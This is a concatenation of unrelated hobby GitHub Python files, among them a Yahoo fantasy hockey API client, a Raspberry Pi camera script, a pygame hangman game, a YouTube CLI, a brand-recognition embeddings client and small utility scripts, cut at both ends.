super().__init__(credentials)\n self.base_url = \"https://fantasysports.yahooapis.com/fantasy/v2/\"\n self.game = game_id or self.get_game()\n self.league = league_id\n\n def get_team(self, team_id, format='json'):\n response = self.get(self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/\", format=format)\n try:\n raw_team_data = self.__flatten_list_of_dicts(response['fantasy_content']['team'][0])\n except KeyError as err:\n if \"fantasy_content\" in err.args:\n # The request was successful, but there was no matching team ID\n return None\n return raw_team_data\n\n def get_team_matchups(self, team_id, format='json'):\n \"\"\"For a given team, fetch matchup data for all weeks of the season, including stat results\"\"\"\n response = self.get(self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/matchups/\", format='json')\n raw_matchup_data = response['fantasy_content']['team'][1]['matchups']\n\n matchups = []\n for key in raw_matchup_data.keys():\n if utilities.safe_cast(key, int):\n # Save matchup info dictionary\n matchup_info = raw_matchup_data[key]['matchup']\n\n # The stat info is nested, so the following is to un-nest it and put it directly in this dictionary\n matchup_team_dictionary = raw_matchup_data[key]['matchup']['0']['teams']\n for mk in matchup_team_dictionary.keys():\n if utilities.safe_cast(mk, int) != None:\n team_info = self.__flatten_list_of_dicts(matchup_team_dictionary[mk]['team'][0])\n # Check if we have the target team_id, and if so, gather the stats\n if (utilities.safe_cast(mk, int) != None) and (team_info['team_id'] == team_id):\n # Set the 'stats' part of the matchup info and jump out\n matchup_info['stats'] = matchup_team_dictionary[mk]['team'][1]['team_stats']['stats']\n break\n\n if 'stats' not in matchup_info.keys():\n raise Exception(\"Could not find stats info for \" + str(team_id))\n\n # Remove un-needed info from dictionary before moving on\n matchup_info.pop(\"0\")\n \n matchups.append(matchup_info)\n\n return matchups\n\n def get_all_teams(self, format='json'):\n \"\"\"Gets a list of teams participating in the fantasy league along with their basic team info\"\"\"\n response = self.get(self.base_url + \"/league/\" + str(self.game) + \".l.\" + str(self.league) + \"/teams/\", format=format)\n raw_team_list = response['fantasy_content']['league'][1]['teams']\n \n # Flatten the team info, because Yahoo's JSON is very packed with garbage info\n team_list = []\n for key in raw_team_list.keys():\n # Remove non-team dict entries from processing\n if (utilities.safe_cast(key, int)):\n team_info = self.__flatten_list_of_dicts(raw_team_list[key]['team'][0])\n # Add team info dict to the overall list of teams\n team_list.append(team_info)\n \n return team_list\n\n def get_team_roster(self, team_id, format='json'):\n return self.get(self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/roster/\", format=format)\n\n def get_game(self, format='json'):\n \"\"\"Fetches the game ID for the current NHL season in Yahoo\"\"\"\n response = self.get(self.base_url + \"game/nhl\", format=format)\n return response['fantasy_content']['game'][0]['game_id']\n\n def get_league(self, format='json'):\n return self.get(self.base_url + \"league/\" + str(self.game) + \".l.\" + str(self.league) + \"/\", format=format)\n\n def get_all_players(self, format='json'):\n return self.get(self.base_url + \"league/\" + str(self.game) + \".l.\" + 
str(self.league) + \"/players/\", format=format)\n\n def __flatten_list_of_dicts(self, list_of_dictionaries):\n \"\"\"Flatten the list of property dictionaries into one dictionary. This ignores non-dictionaries in the list\"\"\"\n result_dict = {}\n for single_dictionary in list_of_dictionaries:\n if type(single_dictionary) == dict:\n result_dict.update(single_dictionary)\n\n return result_dict \n\n\nclass XmlFantasyHockeyApi(YahooApi):\n \n def __init__(self, credentials, league_id, game_id=None):\n super().__init__(credentials)\n self.base_url = \"https://fantasysports.yahooapis.com/fantasy/v2/\"\n self._ns = {\"yahoo\": \"http://fantasysports.yahooapis.com/fantasy/v2/base.rng\"}\n self.game = game_id or self.get_game()\n self.league = league_id\n\n def get_game(self):\n \"\"\"Gets the game ID for the current NHL season in Yahoo\"\"\"\n # Send the request\n url = self.base_url + \"game/nhl\"\n response = self.get(url, format='xml')\n\n # Convert XML text into object and get game ID\n game_id = et.fromstring(response)\\\n .find('yahoo:game', self._ns)\\\n .find('yahoo:game_id', self._ns)\\\n .text\n\n return int(game_id)\n\n def get_team(self, team_id):\n \"\"\"Gets the team info given a team's Yahoo specific team ID\"\"\"\n # Send request\n url = self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/\"\n response = self.get(url, format='xml')\n \n # Convert XML text into object and return the outer team tag\n return et.fromstring(response)\\\n .find('yahoo:team', self._ns)\n\n def get_team_with_matchups(self, team_id):\n \"\"\"For a given team, fetch all data, including matchups and stats\"\"\"\n # Send request\n url = self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/matchups/\"\n response = self.get(url, format='xml')\n\n return et.fromstring(response)\\\n .find('yahoo:team', self._ns)\n\n def get_matchups(self, team_id):\n \"\"\"For a given team, fetch matchup data for all weeks of the season, including stat results\"\"\"\n return self.get_team_with_matchups(team_id)\\\n .find('yahoo:matchups', self._ns)\n\n def get_all_teams(self):\n \"\"\"Gets a list of teams participating in the fantasy league along with their basic team info\"\"\"\n # Send request\n url = self.base_url + \"/league/\" + str(self.game) + \".l.\" + str(self.league) + \"/teams/\"\n response = self.get(url, format='xml')\n\n return et.fromstring(response)\\\n .find('yahoo:league', self._ns)\\\n .find('yahoo:teams', self._ns)\n","repo_name":"kmobile33/yahoo-fantasy-nhl","sub_path":"yahoo/fantasy_hockey_api.py","file_name":"fantasy_hockey_api.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42256586591","text":"#!/usr/bin/python3\n\nimport io\nfrom picamera import PiCamera\nfrom time import sleep\nfrom PIL import Image, ImageDraw, ImageFont\nfrom datetime import datetime\nimport sys\nfrom pathlib import Path\n\nimport Configuration as cfg\nresX = cfg.camera[\"resX\"]\nresY = cfg.camera[\"resY\"]\n\nPath( cfg.camera[\"path\"] ).mkdir(parents=True, exist_ok=True)\nimageName = cfg.camera[\"path\"] + \"/\" + datetime.today().strftime(\"IMG_%y%m%d_%H%M%S.jpg\")\n\n\nstream = io.BytesIO()\nwith PiCamera() as camera:\n\tcamera.resolution = (resX, resY)\n\tcamera.start_preview()\n\tsleep( int(cfg.camera[\"secondsToFocus\"]) )\n\tcamera.capture(stream, format='jpeg')\n\n# \"Rewind\" the stream to the beginning so we can read 
its content\nstream.seek(0)\nimage = Image.open(stream)\n\nfontsize = int(resX/15) # starting font size\nfont = ImageFont.truetype(\"arialr.ttf\", fontsize)\ndraw = ImageDraw.Draw(image)\n\n# time\ndraw.text((int(resX/4*3), int(resY/13*2)), datetime.today().strftime('%H:%M'), font=font, fill='white', stroke_width=2)\n# time elapsed\nif( len(sys.argv) >= 2 ):\n\tdraw.text((int(resX/4*3), int(resY/13*4)), sys.argv[1], font=font, fill='white', stroke_width=2)\n# temperature\nif( len(sys.argv) >= 3 ):\n\tdraw.text((int(resX/4*3), int(resY/13*8)), sys.argv[2], font=font, fill='yellow', stroke_width=2)\n\nimage.show()\nimage.save(imageName)\n\nprint(imageName)\n","repo_name":"jbeyoglo/Proofer","sub_path":"TakePhoto.py","file_name":"TakePhoto.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26142117469","text":"import pandas as pd\nimport datetime, time\n#\n# activity = pd.read_csv('./datas/novin.csv', sep = ',')\n\ndef convertTime(t):\n    x = time.strptime(t,'%H:%M')\n    return str(int(datetime.timedelta(hours=x.tm_hour,minutes=x.tm_min,seconds=x.tm_sec).total_seconds()))\n\nactivity = pd.read_csv('./datas/novin.csv', sep=',',converters={'activity_end(s)': convertTime,\n                                                                'activity_begin(s)': convertTime})\n\n#activity = pd.read_csv('./datas/novin.csv', sep=',')\n\nactivity['activity_length(s)'] = activity['activity_end(s)'].subtract(activity['activity_begin(s)'])\nactivity['walk_duration(s)'] = activity['activity_length(s)'].subtract(activity['pause(s)'])\nactivity['tiredness(s)'] = activity['pause(s)'].divide(activity['walk_duration(s)'])\nactivity['speed(s)'] = activity['step_count'].divide(activity['walk_duration(s)'])\n\nactivity.to_csv('./datas/novins_final', index= False)\n\nprint(activity.head())","repo_name":"surajrasaq/suraj","sub_path":"csv_converter.py","file_name":"csv_converter.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35305804051","text":"import pygame,sys\r\nimport time\r\nimport string\r\nimport random\r\nfrom PIL import Image\r\npygame.init()\r\ndisplay=pygame.display.set_mode((1540,800))\r\nblack = pygame.Color(0, 0, 0)\r\nwhite = pygame.Color(255, 255, 255)\r\nred = pygame.Color(255, 0, 0)\r\ngreen = pygame.Color(0, 255, 0)\r\nblue = pygame.Color(0, 0, 255)\r\npygame.display.set_caption('My First Game-By Vishnu Mali')\r\nclock = pygame.time.Clock() \r\nfont=pygame.font.SysFont(\"Serif\",22)\r\nfont2=pygame.font.SysFont(\"Serif\",28)\r\n#----------------------------------------------------------------------------------------\r\nIMAGES = [r\"step0.jpg\",r\"step1.jpg\",r\"step2.jpg\",r\"step3.jpg\",r\"step4.jpg\",r\"step5.jpg\",r\"step6.jpg\",r\"death.jpg\"]\r\ndef load_words(): \r\n    F = open(\"easywords.txt\", 'r')\r\n    line = F.readline()\r\n    word_list = line.split(\" \")\r\n    return word_list\r\ndef choose_word():\r\n    word_list = load_words()\r\n    secret_word = random.choice(word_list)\r\n    secret_word = secret_word.lower()\r\n    return secret_word\r\ndef is_word_guessed(secret_word, letters_guessed,sourav):\r\n    if len(secret_word)==sourav:\r\n        return True\r\n    return False\r\ndef get_guessed_word(secret_word, letters_guessed):\r\n    index = 0\r\n    guessed_word = \"\"\r\n    while (index < len(secret_word)):\r\n        if secret_word[index] in letters_guessed:\r\n            guessed_word += secret_word[index]\r\n        else:\r\n            guessed_word += \"_\"\r\n        index += 1\r\n    return guessed_word\r\ndef 
get_available_letters(letters_guessed):\r\n letters_left = list(string.ascii_lowercase)\r\n for el in letters_guessed:\r\n letters_left.remove(el)\r\n return letters_left\r\ndef hangman(secret_word):\r\n display.blit(font.render(\"Starting The Game.Please wait...\", True, blue), (250,670))\r\n display.blit(pygame.image.load(\"logo.png\"),(250,0))\r\n pygame.display.update()\r\n pygame.time.wait(2*1000)\r\n newgame=True\r\n rect1=pygame.Rect(150, 150, 70, 50)\r\n won=0\r\n lose=0\r\n while newgame:\r\n secret_word = choose_word()\r\n display.fill(white)\r\n color=white\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n msg2=\"Welcome to the game, Hangman!.I am thinking of a word that is \"+str(len(secret_word))+ \" letters long.\"\r\n display.blit(font.render(msg2, True, blue), (80,100))\r\n pygame.display.update()\r\n pygame.time.wait(1*1000)\r\n letters_guessed = []\r\n imagecount=0\r\n sourav=0\r\n gamefinish=False\r\n while imagecount<=len(IMAGES) and not gamefinish: \r\n available_letters = get_available_letters(letters_guessed)\r\n display.blit(font.render(\"Available letters are ==\"+str(available_letters), True, blue), (50,150))\r\n pygame.display.update()\r\n guess=''\r\n letter=\"\"\r\n apple=True\r\n while apple:\r\n for el in pygame.event.get():\r\n if el.type==pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if el.type==pygame.KEYDOWN:\r\n if el.key==pygame.K_BACKSPACE:\r\n display.fill(color)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font.render(\"Available letters are ==\"+str(available_letters), True, blue), (50,150))\r\n pygame.display.update()\r\n guess=guess[:-1]\r\n elif el.key==pygame.K_RETURN:\r\n if len(guess)==1:\r\n letter=guess\r\n apple=False\r\n break \r\n else:\r\n display.fill(white)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font.render(\"Enter a single letter only\", True, red), (50,100))\r\n pygame.display.update()\r\n pygame.time.wait(2*1000)\r\n guess='' \r\n else: \r\n guess += el.unicode\r\n display.blit(font2.render(\"guess a letter------>\"+guess, True,(0,0,0)), (100,400)) \r\n pygame.display.flip()\r\n \r\n if letter not in available_letters:\r\n display.fill(white)\r\n color=white\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n status=\"This letter is already guessed you can't guess it again.Try again with a different letter.\"\r\n display.blit(font.render(status, True, red), (50,200))\r\n display.blit(font.render(\"you gussed word till now as :---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,250))\r\n pygame.display.update()\r\n continue\r\n if letter in secret_word:\r\n letters_guessed.append(letter)\r\n sourav+=secret_word.count(letter)\r\n display.fill(green)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n color=green\r\n display.blit(font.render(\"Ohh Yeah ! Good Guess:-).Keep it up :---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,250))\r\n if is_word_guessed(secret_word, letters_guessed,sourav) == True:\r\n status2=\" * * Congratulations, you won! 
* * \"\r\n display.fill(pygame.Color(255,255,0))\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font2.render(status2, True, blue), (50,50))\r\n display.blit(pygame.image.load(\"won.jpg\"),(100,180))\r\n gamefinish=True\r\n display.blit(font2.render(\"Press 'y' to play again else press 'n'\", True, green), (140,130))\r\n display.blit(font.render(\"You are a Champion.The word was :---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,100))\r\n won+=1\r\n pygame.display.update()\r\n pygame.time.wait(1*1000)\r\n newgame=False\r\n banana=True\r\n while banana:\r\n for el in pygame.event.get():\r\n if el.type==pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if el.type==pygame.KEYDOWN:\r\n if el.key==pygame.K_y:\r\n newgame=True\r\n banana=False\r\n break \r\n elif el.key==pygame.K_n: \r\n pygame.quit() \r\n quit()\r\n else:\r\n display.fill(red)\r\n color=red\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font.render(\"Oops! That letter is not in my word: ---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,250))\r\n letters_guessed.append(letter)\r\n display.blit(pygame.image.load(IMAGES[imagecount]),(500,350))\r\n pygame.display.update()\r\n imagecount+=1\r\n if imagecount>=len(IMAGES):\r\n display.fill(white)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font2.render(\"The Word i thinking was:---->\"+secret_word, True, red), (180,150))\r\n display.blit(font2.render(\"YOU LOOSE . NOW SHUT YOUR SHITTY MOUTH AND GO AWAY\", True, red), (180,200))\r\n display.blit(pygame.image.load(IMAGES[-1]),(350,300))\r\n gamefinish=True\r\n lose+=1\r\n display.blit(font2.render(\"Press 'y' to play again else press 'n'\", True, green), (180,250))\r\n pygame.display.update()\r\n pygame.time.wait(1*1000)\r\n newgame=False\r\n banana=True\r\n while banana:\r\n for el in pygame.event.get():\r\n if el.type==pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if el.type==pygame.KEYDOWN:\r\n if el.key==pygame.K_y:\r\n newgame=True \r\n banana=False\r\n break\r\n elif el.key==pygame.K_n: \r\n pygame.quit() \r\n quit()\r\nwhile True: \r\n display.fill(white)\r\n secret_word = choose_word()\r\n hangman(secret_word)\r\n for event in pygame.event.get(): \r\n if event.type == pygame.QUIT: \r\n pygame.quit() \r\n quit() \r\n pygame.display.update() ","repo_name":"Vishnu-yes-i-am/hang_man_with_pygame","sub_path":"hangman_game.py","file_name":"hangman_game.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12903357698","text":"#!/usr/bin/env python\nfrom pyyoutube import Api\nimport os\nimport click\n\n\nAPI = Api(api_key=os.environ[\"API_KEY\"])\nCHANNEL = os.environ[\"YT_CHANNEL\"]\n\n\ndef get_channel_info(channel_id, api=API):\n \"\"\"Get channel info\"\"\"\n channel_info = api.get_channel_info(channel_id=channel_id)\n return channel_info.items[0]\n\n\ndef get_channel_playlist(channel_id, api=API):\n \"\"\"Get channel's playlist\"\"\"\n playlists_by_channel = api.get_playlists(channel_id=channel_id, count=None)\n return playlists_by_channel.items\n\n\ndef get_playlist_name(playlist_id, api=API):\n \"\"\"Get playlist name\"\"\"\n playlist_info = api.get_playlist_info(playlist_id=playlist_id)\n return playlist_info.items[0].snippet.title\n\n\n@click.group()\ndef cli():\n 
pass\n\n\n@cli.command(\"channel\")\n@click.option(\"--channel-id\", default=CHANNEL, help=\"Channel ID\")\ndef cli_channel_info(channel_id):\n \"\"\"Get channel info\n Example: yt channel --channel-id \n \"\"\"\n\n channel = get_channel_info(channel_id)\n print(channel)\n\n\n@cli.command(\"playlists\")\n@click.option(\"--channel-id\", default=CHANNEL, help=\"Channel ID\")\ndef list_playlists(channel_id):\n \"\"\"List all playlists from a channel\n Example: yt playlists --channel-id \n \"\"\"\n\n playlists = get_channel_playlist(channel_id)\n for playlist in playlists:\n print(playlist.id, playlist.snippet.title)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"nogibjj/assimilate-aws","sub_path":"yt.py","file_name":"yt.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"13293421072","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 22 13:55:59 2021\r\n\r\n@author: Dell\r\n\"\"\"\r\n#Merge multiple .dat files to one\r\n\r\n# Creating a list of filenames\r\nfilenames = ['1.dat', '2.dat','3.dat']\r\n \r\n# Open file3 in write mode\r\nwith open('123.dat', 'wb') as outfile:\r\n \r\n # Iterate through list\r\n for names in filenames:\r\n \r\n # Open each file in read mode\r\n with open(names,'rb') as infile:\r\n \r\n # read the data from file1 and\r\n # file2 and write it in file3\r\n outfile.write(infile.read())","repo_name":"vaisakhm99/Random-Number-Generator","sub_path":"merge_dat.py","file_name":"merge_dat.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22058538755","text":"#!/usr/bin/env python3\n\n\"\"\"\nBRAND RECOGNITION EMBEDDINGS GENERATION CLIENT\n==============================================\n\nThe following program is used to update embeddings files and frames\n\"\"\"\n\n# %%\n# Importing Libraries\nfrom inference_client import *\nimport os\nimport argparse\nimport json\nimport pickle\nimport tqdm\nimport cv2 as ocv\n\n# %%\n# Main Embeddings Extraction Class\nclass Embeddings:\n def __init__(self, addr, server_ip, emb_label, embed, sv_embed):\n \"\"\"\n This method is used to initialize Brand Recognition embedding generation client\n\n Method Input\n =============\n addr : Local address to data\n server_ip : Server IP at which GRPC server is running\n Format : \"IP:Port\"\n Example : '0.0.0.0:1235'\n emb_label : Label for the current generated embeddings\n embed : Absolute address of the embeddings file\n sv_embed : Absolute address of directory to save embedding in binary & JSON\n\n Method Output\n ==============\n None\n \"\"\"\n self.vid_addr = addr\n self.embedding_label = emb_label\n self.embedding_data_address = embed\n self.embedding_save_directory = sv_embed\n self.scbr_server_ip = server_ip\n self.scbr_inference = br_client(self.scbr_server_ip)\n self.__vid_obj__ = ocv.VideoCapture(self.vid_addr)\n self.FPS = int(self.__vid_obj__.get(ocv.CAP_PROP_FPS))\n self.height = int(self.__vid_obj__.get(ocv.CAP_PROP_FRAME_HEIGHT))\n self.width = int(self.__vid_obj__.get(ocv.CAP_PROP_FRAME_WIDTH))\n self.__total_frames__ = int(self.__vid_obj__.get(ocv.CAP_PROP_FRAME_COUNT))\n self.__new_embeddings__ = dict()\n try:\n with open(self.embedding_data_address, 'rb') as efile1:\n self.embeddings = pickle.load(efile1)\n self.__embeddings_available__ = True\n self.__new_embeddings__['embeds'] = np.array(self.embeddings['embeds'])\n 
self.__new_embeddings__['tags'] = self.embeddings['tags']\n self.__new_embeddings__['addrs'] = self.embeddings['addrs']\n self.__brand_list__ = list(set(self.__new_embeddings__['tags']))\n except:\n self.__embeddings_available__ = False\n self.__brand_list__ = list()\n if not os.path.exists(f'{self.embedding_save_directory}/Frames'):\n os.mkdir(f'{self.embedding_save_directory}/Frames')\n \n def __str__(self):\n \"\"\"\n This method is __str__ implementation of subject class\n\n Method Input\n =============\n None\n \n Method Output\n ==============\n New Line\n \"\"\"\n print(\"\"\"\n ==================================================\n | Brand Recognition Embeddings Generation Client |\n ==================================================\n \"\"\")\n print(f'Current Embedding Label: {self.embedding_label}')\n print(f'Brand Recognition Server IP Address: {self.scbr_server_ip}')\n print(f'Client ID: {self.scbr_inference.client_name}')\n print(f'Video FPS: {self.FPS}')\n print(f'Video Height: {self.height}')\n print(f'Video Width: {self.width}')\n print(f'Total Video Frames: {self.__total_frames__}')\n print(f'Number of Brand Recognition Labels: {len(self.__brand_list__)}')\n print(f'Brand Recognition Labels: {self.__brand_list__}')\n print(f'Embeddings Extraction Address: {self.embedding_save_directory}')\n print('\\n---------------------------------------------')\n return '\\n'\n \n def __embedding_handler__(self, data, labels, new_addrs):\n \"\"\"\n This method is used to save & handle embeddings\n\n Method Input\n =============\n data : New generated embeddings data\n labels : New labels for the respective generated embeddings\n new_addrs : New embeddings frames addresses\n\n Method Output\n ==============\n None\n \"\"\"\n print('>>>>> Processing Embeddings')\n if self.__embeddings_available__ == True:\n self.__new_embeddings__['embeds'] = np.append(self.__new_embeddings__['embeds'], np.array(data), axis = 0)\n self.__new_embeddings__['tags'].extend(labels)\n self.__new_embeddings__['addrs'].extend(new_addrs)\n else:\n self.__new_embeddings__['embeds'] = np.array(data)\n self.__new_embeddings__['tags'] = labels\n self.__new_embeddings__['addrs'] = new_addrs\n print('>>>>> Saving Embeddings as Binary')\n with open(f'{self.embedding_save_directory}/Embeddings', 'wb') as file1:\n pickle.dump(self.__new_embeddings__, file1)\n print('>>>>> Saving Embeddings as JSON')\n with open(f'{self.embedding_save_directory}/Embeddings.json', 'w') as file1:\n self.__new_embeddings__['embeds'] = self.__new_embeddings__['embeds'].tolist()\n json.dump(self.__new_embeddings__, file1)\n \n def __call__(self, skip = 0):\n \"\"\"\n This method is used to generate embeddings from subject video file\n\n Method Input\n =============\n skip : Number of frames to skip in local video inference ( default : 0 )\n\n Method Output\n ==============\n None\n \"\"\"\n new_emb_labels, new_embs, new_addrs = list(), list(), list()\n count, skip_count, ret = 0, skip, True\n with tqdm.tqdm(total = self.__total_frames__, bar_format = '{l_bar}{bar:10}{r_bar}{bar:-10b}', position = 0, leave = True) as bar:\n while ret:\n ret, cv_dat = self.__vid_obj__.read()\n if not ret:\n break\n if skip_count < skip:\n skip_count += 1\n else:\n skip_count = 0\n pil_dat = Image.fromarray(ocv.cvtColor(cv_dat, ocv.COLOR_BGR2RGB))\n res = self.scbr_inference([pil_dat])\n new_emb_labels.append(self.embedding_label)\n new_embs.append(res[2][0])\n ocv.imwrite(f'{self.embedding_save_directory}/Frames/{self.embedding_label}_' + str(count).zfill(10) + 
'.jpg', cv_dat)\n new_addrs.append(f'{self.embedding_label}_' + str(count).zfill(10) + '.jpg')\n count += 1\n bar.set_description(f'Label: {self.embedding_label} | Skipping {skip} Frames | Progress') \n bar.update(1)\n self.__embedding_handler__(new_embs, new_emb_labels, new_addrs)\n os.system(f'chmod 777 /{self.embedding_save_directory}/*')\n os.system(f'chmod 777 /{self.embedding_save_directory}/Frames/*')\n\n# %%\n# Embeddings Generation Execution\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description = 'Brand Recognition Embedding Generation Client.')\n parser.add_argument('-ip', '--server_ip', type = str, help = 'IP Address to GRPC Server => IP:Port', required = True)\n parser.add_argument('-lab', '--label', type = str, help = 'Label Against Subject Video for Embeddings Generation', required = True)\n parser.add_argument('-sk', '--skip', type = int, help = 'Number of Frames to Skip in Embeddings Generation', default = 0)\n parser.add_argument('-l', '--link', type = str, help = 'Local Video Address', default = '/video.mp4' )\n parser.add_argument('-embl', '--embedding_addr', type = str, help = 'Current Available Embeddings File', default = '/Embeddings' )\n parser.add_argument('-embs', '--embedding_save', type = str, help = 'Directory to Save Embeddings Files', default = '/Output' )\n args = vars(parser.parse_args())\n emb = Embeddings(addr = args['link'], server_ip = args['server_ip'], emb_label = args['label'], embed = args['embedding_addr'], sv_embed = args['embedding_save'])\n print(emb)\n emb(skip = args['skip'])\n ","repo_name":"codeadeel/Brand-Recognition","sub_path":"Clients/embeddings_client.py","file_name":"embeddings_client.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"782564628","text":"import sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(10**6)\r\n\r\nn = int(input())\r\ninorder = list(map(int, input().split()))\r\npost = list(map(int, input().split()))\r\nindex = [0] * (n+1)\r\n\r\ndef order(pstart, istart, size):\r\n if size == 0:\r\n return\r\n\r\n pend = pstart + size - 1\r\n node = post[pend]\r\n print(node, end=' ')\r\n \r\n i = index[node]\r\n s = i - istart\r\n order(pstart, istart, s)\r\n pstart += s\r\n istart += s + 1\r\n s = size - s - 1\r\n order(pstart, istart , s)\r\n\r\nfor i in range(n):\r\n index[inorder[i]] = i\r\n\r\norder(0,0, n)","repo_name":"ppocchi/Algorithm","sub_path":"백준/Gold/2263. 
트리의 순회/트리의 순회.py","file_name":"트리의 순회.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73696399129","text":"# importing the modules needed to run the program\n\nfrom services import process_images_with_conf\nfrom setup import load_conf, communicate_with_arduino, display_on_pc\nfrom vc.detector import Group\n\nif __name__ == '__main__':\n # Loading configurations from config file\n conf = load_conf(file_path='conf.json')\n # Getting settings in configurations\n settings = conf['settings']\n # Processing images (Vehicle detection and rendering is included)\n print(conf['settings'])\n for i, (name, folder_conf) in enumerate(conf[\"FOLDER_DETAILS\"].items()):\n group = Group(name)\n if folder_conf[\"run\"]:\n (img, _images), wn, __conf = process_images_with_conf(grp=group, conf=folder_conf, i=i)\n # Checking if arduino communication is enabled(all values and conf are in the conf file)\n c_thread = None\n if settings['controller'] is True and __conf[\"send\"]:\n c_thread = communicate_with_arduino(conf=conf, data=group.serialise(), ims=_images, wn=wn)\n # Checking if display is enabled\n if settings[\"monitor\"] is True and __conf[\"show\"] is True:\n display_on_pc(window_name=wn, image=img)\n # while c_thread and c_thread.is_alive():\n # pass\n # else:\n # break\n # Finally, exiting program\n exit(0)\n","repo_name":"DeCraftsman64/vehicle_detector_python_arduino","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44160073550","text":"with open(\"cluster.txt\") as f:\n data = f.readlines()\n\nwith open('test.csv') as f:\n ques = f.readlines()\n\ndata = data[1:]\nop = {}\nfor i in data:\n line = i.split(' ')\n if line[1] not in op:\n op[line[1]] = []\n op[line[1]].append(ques[int(line[2])-1])\n\nfor key, value in op.items():\n val = list(set(value))\n op[key] = val\n\nwith open('output.csv', 'w') as f:\n for key, value in op.items():\n for i in value:\n f.write(i)\n f.write(\"\\n\")","repo_name":"usercontext/TaskRecommend","sub_path":"cluster_number_to_output.py","file_name":"cluster_number_to_output.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13975478641","text":"from __future__ import absolute_import\nimport warnings\nimport fabric.api as fab\nimport datetime\nimport os\nfrom time import time, altzone\nfrom .base import BaseCommandUtil\nfrom .utils import legacy_wrap\nimport git\n\n\ndef _git_raw_write_object(repo, obj):\n from stat import S_ISLNK\n from gitdb import IStream\n try:\n from cStringIO import StringIO\n except ImportError:\n from StringIO import StringIO\n\n if obj.__class__.type == git.Blob.type:\n absfilepath = os.path.join(repo.working_tree_dir, obj.path)\n st = os.lstat(absfilepath)\n streamlen = st.st_size\n if S_ISLNK(st.st_mode):\n stream = StringIO(os.readlink(absfilepath))\n else:\n stream = open(absfilepath, 'rb')\n else:\n stream = StringIO()\n obj._serialize(stream)\n streamlen = stream.tell()\n stream.seek(0)\n istream = repo.odb.store(IStream(obj.__class__.type, streamlen, stream))\n obj.binsha = istream.binsha\n return obj\n\n\ndef _create_blob_from_file(repo, filepath):\n from git.index.fun import stat_mode_to_index_mode\n from git.util import to_native_path_linux\n\n absfilepath = 
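The 2263 traversal script above rebuilds the preorder from the inorder and postorder sequences: the last postorder entry of any range is that subtree's root, and its position in the inorder list splits the remaining entries into left and right subtrees. A small self-contained sketch of the same recursion; the three-node tree is illustrative only.

# inorder [1, 2, 3] with postorder [1, 3, 2] describes the tree 2 -> (1, 3).
inorder = [1, 2, 3]
post = [1, 3, 2]
index = {v: i for i, v in enumerate(inorder)}

def preorder(pstart, istart, size, out):
    if size == 0:
        return
    root = post[pstart + size - 1]   # last postorder entry of this range
    out.append(root)
    left = index[root] - istart      # size of the left subtree
    preorder(pstart, istart, left, out)
    preorder(pstart + left, istart + left + 1, size - left - 1, out)

result = []
preorder(0, 0, len(inorder), result)
print(result)  # [2, 1, 3]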
